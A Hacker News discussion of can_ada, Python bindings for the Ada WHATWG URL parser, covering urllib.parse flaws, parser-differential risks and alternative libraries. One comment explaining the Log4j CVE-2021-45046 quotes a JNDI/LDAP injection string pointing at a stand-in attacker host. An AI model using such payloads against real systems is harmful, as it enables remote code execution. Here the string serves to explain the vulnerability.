[HN Gopher] Parsing URLs in Python
___________________________________________________________________
Parsing URLs in Python
Author : ibobev
Score : 78 points
Date : 2024-03-16 16:53 UTC (6 hours ago)
(HTM) web link (tkte.ch)
(TXT) w3m dump (tkte.ch)
| memco wrote:
| This is intriguing to me for the performance and correctness
| reasons, but also if it makes the result more dev friendly than
| the urllib.parse tiple-ish-object result thing.
| Areading314 wrote:
| Hard to imagine the tradeoff of using a third party binary
| library developed this year vs just using urllib.parse being
| worth it. Is this solving a real problem?
| pyuser583 wrote:
| urlib.parse is a pain. We really need something more like
| pathlib.Path.
| masklinn wrote:
| That used to be werkzeug.urls, kinda (it certainly had a more
| convenient API than urllib.parse), but it was killed in
| Werkzeug 3.
| pyuser583 wrote:
| I remember and miss that. But I'm not going to install
| werkzeug just for the url parsing.
| d_kahneman7 wrote:
| Is it that inconvenient?
| Ch00k wrote:
| There is https://github.com/gruns/furl
| AMCMneCy wrote:
| Also https://github.com/aio-libs/yarl
| pyuser583 wrote:
| Yes! That's the one I like!
| VagabundoP wrote:
| This library is very pythonic.
| joouha wrote:
| You might be interested in
| https://github.com/fsspec/universal_pathlib
| masklinn wrote:
| According to itself, it's solving the issue of parsing
| differentials vulnerabilities: urllib.parse is ad-hoc and
| pretty crummy, and the headliner function "urlparse" is
| literally the one you should not use under any circumstance: it
| follows RFC 1808 (maybe, anyway) which was deprecated by RFC
| 2396 _25 years ago_.
|
| The odds that any other parser uses the same broken semantics
| are basically nil.
| Areading314 wrote:
| It seems unlikely that this C++ library written by a solo dev
| is somehow more secure than the Python standard library would
| be for such a security-sensitive task.
| masklinn wrote:
| Not in the sense of differential vulnerabilities, since the
| standard library _refuses_ to match any sort of modern
| standard.
|
| It's also
|
| 1. not a solo dev
|
| 2. Daniel Lemire
|
| 3. a serious engineering _and_ research effort:
| https://arxiv.org/pdf/2311.10533.pdf
| Areading314 wrote:
| This is the commit history:
| https://github.com/TkTech/can_ada/commits/main/
|
| I guess you are right that there are 2 commits from a
| different dev, so it is technically not a solo project. I
| still wouldn't ever use this in production code.
| bqmjjx0kac wrote:
| The can_ada repo threw me off, too. It looks super
| amateurish because of the lack of tests, fuzzers, etc.
|
| But it appears that they've just exported the meat of the
| Ada project and left everything else upstream.
| masklinn wrote:
| ...
|
| can_ada is just the python bindings.
|
| The actual underlying project is at
| https://github.com/ada-url/ada
| TkTech wrote:
| Hi, can_ada (but not ada!) dev here. Ada is over 20k lines
| of well-tested and fuzzed source by 25+ developers, along
| with an accompanying research paper. It is the parser used
| in node.js and parses billions of URLs a day.
|
| can_ada is simply a 60-line glue and packaging making it
| available with low overhead to Python.
| woodruffw wrote:
| I agree that the stdlib parser is a mess, but as an
| observation: replacing one use of it with a (better!)
| implementation _introduces_ a potential parser differential
| where one didn't exist before. I've seen this issue crop up
| multiple times in real Python codebases, where a well-
| intentioned developer adds a differential by incrementally
| replacing the old, bad implementation.
|
| That's the perverse nature of "wrong but ubiquitous" parsers:
| unless you're confident that your replacement is _complete_ ,
| you can make the situation worse, not better.
| Spivak wrote:
| > unless you're confident that your replacement is complete
|
| And that any 3rd party libs you use also don't ever call
| the stdlib parser internally because you do not want to
| debug why a URL works through some code paths but not
| others.
|
| Turns out that url parsing is a cross-cutting concern like
| logging where libs should defer to the calling code's
| implementation but the Python devs couldn't have known that
| when this module was written.
| pyuser583 wrote:
| The Ada programming language is cursed with overlapping acronyms.
| GPS, ADA, SPARK, AWS. Seems it just got a little bit worse.
| Solvency wrote:
| It is _mindboggling_ to me how often developers create project
| names without even _trying_ to search for precedent names _in
| their own domain /industry_.
|
| Calling this Ada is just ridiculous.
| pyuser583 wrote:
| Ada needs to fight back. Java templating library! Python
| dependency resolver! Zag image manipulation library! SQL
| event logging persistence framework!
|
| I can't believe Amazon wasn't violating some anti-competition
| rule by using "AWS" for "Amazon Web Services" when it already
| meant "Ada Web Server."
|
| Wow when I search for "Ada GPS" I get global position system
| support libraries before GNAT Programming Studio.
| gjvc wrote:
| yes but they think it's punny/funny/clever
| masklinn wrote:
| > Ada is a WHATWG-compliant and fast URL parser written in
| modern C++
|
| Why would you do that, Daniel?
| TkTech wrote:
| Hah :) It's named after Yagiz Nizipli's (Ada dev) newborn
| daughter, Ada.
| EmilStenstrom wrote:
| At least the can_ada (canada!) makes it a little bit more
| unique.
| ulrischa wrote:
| Parsing an url is really a pain in the a*
| SloopJon wrote:
| Another post in this thread was downvoted and flagged (really?)
| for claiming that URL parsing isn't difficult. The linked
| article claims that "Parsing URLs _correctly_ is surprisingly
| hard. " As a software tester, I'm very willing to believe that,
| but I don't know that the article really made the case.
|
| I did find a paper describing some vulnerabilities in popular
| URL parsing libraries, including urllib and urllib3. Blog post
| here:
|
| https://claroty.com/team82/research/exploiting-url-parsing-c...
|
| Paper here:
|
| https://web-assets.claroty.com/exploiting-url-parsing-confus...
|
| If you remember the Log4j vulnerability from a couple of years
| ago, that was an URL parsing bug.
| masklinn wrote:
| > If you remember the Log4j vulnerability from a couple of
| years ago, that was an URL parsing bug.
|
| I don't think that's a fair description of the issue.
|
| The log4j vulnerability was that it specifically added JNDI
| support (https://issues.apache.org/jira/browse/LOG4J2-313) to
| property substitution (https://logging.apache.org/log4j/2.x/m
| anual/configuration.ht...), which it would apply on logged
| messages. So it was a pretty literal feature of log4j. log4j
| would just pass the URL to JNDI for resolution, and
| substitute the result.
| SloopJon wrote:
| I didn't look into this in detail at the time, but the
| report's summary of CVE-2021-45046 is that the parser that
| validated an URL behaved differently than a separate parser
| used to fetch the URL, so an URL like
| jndi:ldap://127.0.0.1#.evilhost.com:1389/a
|
| is validated as 127.0.0.1, which may be whitelisted, but
| fetched from evilhost.com, which probably isn't.
| bqmjjx0kac wrote:
| Writing a new parser in C++ is a mistake IMO. At the very least,
| you need to write a fuzzer. At best, you should be using one of
| the many memory safe languages available to you.
|
| I retract my criticism if this project is just for fun.
|
| Edit: downvoters, do you disagree?
|
| Edit2: OK, I may have judged a bit prematurely. _Ada_ itself has
| fuzzers and tests. They 're just not exported to the _can_ada_
| project.
| VagabundoP wrote:
| Okay so some googling found me that the "xn--" means the rest of
| the hostname will be unicode, but why does e become -fsa in
| www.xn--googl-fsa.com.
|
| Google failed on the second part.
| whalesalad wrote:
| It's called an IDN. This is an encoding format called puny code
| that transforms international domains into ascii
| js2 wrote:
| Because that's the Punycode representation:
|
| https://en.wikipedia.org/wiki/Punycode
|
| https://www.punycoder.com/
| ekimekim wrote:
| To expand on the sibling comments: This encoding (called
| Punycode) works by combining the character to encode (e) and
| the position the character should be in (the 7th position out
| of a possible 7) into a single number. e is 233, there are 7
| possible positions, and it is in position 6 (0-indexed) so that
| single number is 233 * 7 + 6 = 1637. This is then encoded via a
| fairly complex variable-length encoding scheme into the letters
| "fsa".
|
| See https://en.wikipedia.org/wiki/Punycode#Encoding_the_non-
| ASCI...
| bormaj wrote:
| Why not just use `httpx`? If you're not bound to the stdlib, it's
| a great alternative to `requests` and url parse
| kmike84 wrote:
| The URL parsing in httpx is rfc3986, which is not the same as
| WHATWG URL living standard.
|
| rfc3986 may reject URLs which browsers accept, or it can handle
| them in a different way. WHATWG URL living standard tries to
| put on paper the real browser behavior, so it's a much better
| standard if you need to parse URLs extracted from real-world
| web pages.
| gjvc wrote:
| httpx is great, and "needs to be in base"
| ojbyrne wrote:
| Looking at the github site for can_ada, I discovered that the
| developers live in Montreal, Canada. Nice one.
| TkTech wrote:
| I do! :) I should probably also never be allowed to name
| things.
| kmike84 wrote:
| A great initiative!
|
| We need a better URL parser in Scrapy, for similar reasons. Speed
| and WHATWG standard compliance (i.e. do the same as web browsers)
| are the main things.
|
| It's possible to get closer to WHATWG behavior by using urllib
| and some hacks. This is what https://github.com/scrapy/w3lib
| does, which Scrapy currently uses. But it's still not quite
| compliant.
|
| Also, surprisingly, on some crawls URL parsing can take CPU
| amounts similar to HTML parsing.
|
| Ada / can_ada look very promising!
| TkTech wrote:
| can_ada dev here. Scrapy is a fantastic project, we used it
| extensively at 360pi (now Numerator), making trillions of
| requests. Let me know if I can help :)
___________________________________________________________________
(page generated 2024-03-16 23:00 UTC)